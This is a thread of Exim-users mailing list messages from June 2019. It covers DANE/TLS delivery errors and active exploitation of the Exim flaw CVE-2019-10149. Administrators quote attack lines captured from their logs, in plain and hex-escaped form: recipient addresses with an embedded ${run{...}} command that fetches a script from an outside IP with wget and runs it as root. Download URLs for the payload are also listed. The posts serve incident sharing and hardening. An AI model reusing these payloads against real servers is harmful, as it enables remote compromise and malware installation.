Hello Niels,
12.06.2019 0:58, Niels Dettenbach writes:
> On Tuesday, 11 June 2019, 18:57:41 CEST, Konstantin Boyandin via
> Exim-users wrote:
>> If I am not mistaken, CentOS 6.10 EPEL didn't apply any patches,
>> original Exim 4.91 is still their last version.
>
> The "initial official" date f
Viktor Dukhovni via Exim-users writes
> The thing is, that it as far as I can see only happens when receiving
> messages from the German mail provider GMX.
The gmx.de MTAs support DANE in both directions. Does your MX host
have published DANE TLSA records? Are they correct? Is your
certificate
> On Jun 11, 2019, at 2:08 PM, Thomas Krichel via Exim-users
> wrote:
>
>> shows that the error message in question is from the GnuTLS DANE
>> library in dane_state_init() trying to initialize libunbound...
>
> On the sender or the receiver? Is there any fix I can do
> or do I need to educate
Viktor Dukhovni via Exim-users writes
> A quick web search
Thank you for this!
I certainly tried to search the web many times for this problem
but I could not find a reason, let alone a fix. My problem
is that I'm not an email professional who only deals with these
issues day in and
On Tuesday, 11 June 2019, 18:57:41 CEST, Konstantin Boyandin via
Exim-users wrote:
> If I am not mistaken, CentOS 6.10 EPEL didn't apply any patches,
> original Exim 4.91 is still their last version.
The "initial official" date for patch releases was "officially set" by Exim
project / securit
Might this be relevant?
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929907
which also deals with GnuTLS record receive code.
cheers,
calum.
On 10/06/2019 4:51 pm, Arno Thuber via Exim-users wrote:
Hello,
today I suddenly started to see log lines telling me "A TLS fatal alert ha
On 11.06.19 at 19:34, Calum Mackay wrote:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running
I'm still catching up, but…
On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Is that still necessary/advised, now I'm running 4.92?
thanks,
calum.
--
## List details at https:/
thanks all, for the replies.
On 11/06/2019 7:27 am, Odhiambo Washington wrote:
ought I to be reporting this anywhere?
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
Yes, I meant that there are clearly now exploits active, alth
> On 11 June 2019 17:10:09 CEST, Cyborg via Exim-users wrote:
>> Hi Guys,
>>
>> at the end of this article, is a shodan graph of exim servers in the
>> wild :
>>
>> https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
>>
>> Guess which versions are 90% of all exims out there?
>
> I
On Tue, 11 Jun 2019 at 17:24, Niels Dettenbach (Syndicat IT & Internet) via
Exim-users wrote:
> If I read right, the most major distributors (as exim maintainers too)
> backported any patch or solution at least to the most used earlier versions
> (still provided in their patches / sec updates - s
On 11 June 2019 17:10:09 CEST, Cyborg via Exim-users wrote:
>Hi Guys,
>
>at the end of this article, is a shodan graph of exim servers in the
>wild :
>
>https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
>
>Guess which versions are 90% of all exims out there?
If I read right, the
> On Jun 11, 2019, at 4:30 AM, Jeremy Harris via Exim-users
> wrote:
>
>> 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection
>> to mx-ha03.web.de [212.227.15.17]: (certificate verification failed): TLSA
>> record problem: There was error initializing the DNS query.
>
> It'
On 11/06/2019 16:10, Cyborg via Exim-users wrote:
> at the end of this article, is a shodan graph of exim servers in the wild :
Since it doesn't account for patch status, not especially helpful.
--
Cheers,
Jeremy
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exi
Hi Guys,
at the end of this article, is a shodan graph of exim servers in the wild :
https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
Guess which versions are 90% of all exims out there? ;)
best regards,
Marius
Hi,
Russell King (Tue 11 Jun 2019 15:33:47 CEST):
> Hi,
>
> While looking for the fix on the web version of git.exim.org, I find that
> although I can get a listing based on the branch, I'm unable to get commit
> or commitdiffs.
>
> For example, the page at:
>
> https://git.exim.org/exim.git/sho
I googled 'an7kmd2wp4xo7hpr'
I came across
https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739
Looks like Zimbra (I suppose / assume any MTA), is being "probed" and
pertaining to CVE-2019-9670
Regards
Brent
On 2019/06/11 14:46, Konstantin Boyandin via Exim-users wrote:
Hi C
Hi,
While looking for the fix on the web version of git.exim.org, I find that
although I can get a listing based on the branch, I'm unable to get commit
or commitdiffs.
For example, the page at:
https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91+fixes
gives links such as:
commit | c
On 11.06.19 at 14:46, Konstantin Boyandin via Exim-users wrote:
> I don't know where to report such things. To malware/antivirus
> manufacturers, perhaps?
>
> But the proper question is, IMHO, "why I haven't hardened my Exim
> installations while I could".
>
The Hoster:
#whois 1.2.3.4 | grep -i
Hi Calum,
Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
attacked yesterday by similar means. The attacker, in my case, tried to
download and execute one of the below (I excluded scheme prefix from links):
an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2
On 11/06/2019 10:37, Thomas Krichel via Exim-users wrote:
> If I knew how to make this, sure. I'm trying with
>
> cat /home/ernad/test.mail | /usr/sbin/exim4 -t -d tls > /tmp/debug_tls.out 2>
> /tmp/debug_tls.err
Complex, because it was a 2-recipient message.
One was delivered, non-DANE becaus
Jeremy Harris via Exim-users writes
> On 11/06/2019 05:12, Thomas Krichel via Exim-users wrote:
> > I have an issue that has a similar feel to it. It's with a host of
> > Germanic providers gmx.de, gmx.at, web.de, mailbox.org ...
> >
> > 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt fail
On 11/06/2019 05:12, Thomas Krichel via Exim-users wrote:
> I have an issue that has a similar feel to it. It's with a host of
> Germanic providers gmx.de, gmx.at, web.de, mailbox.org ...
>
> 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection
> to mx-ha03.web.de [212.227
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targeting Linux systems using systemd.
Not only that, it is
On Tue, 11 Jun 2019 at 10:26, Cyborg via Exim-users
wrote:
> On 11.06.19 at 02:10, Calum Mackay via Exim-users wrote:
> >
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2f
Hi,
On Tue, 11 Jun 2019 at 7:53, Cyborg via Exim-users wrote:
> :
> Restricted characters in address
Oh, you censored the address you are sending from? :-D
> This attack was presented to you by... the Seychelles Islands.
Ah, and I wondered why I did not see any try in my logs.
But I have
On 11.06.19 at 02:10, Calum Mackay via Exim-users wrote:
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\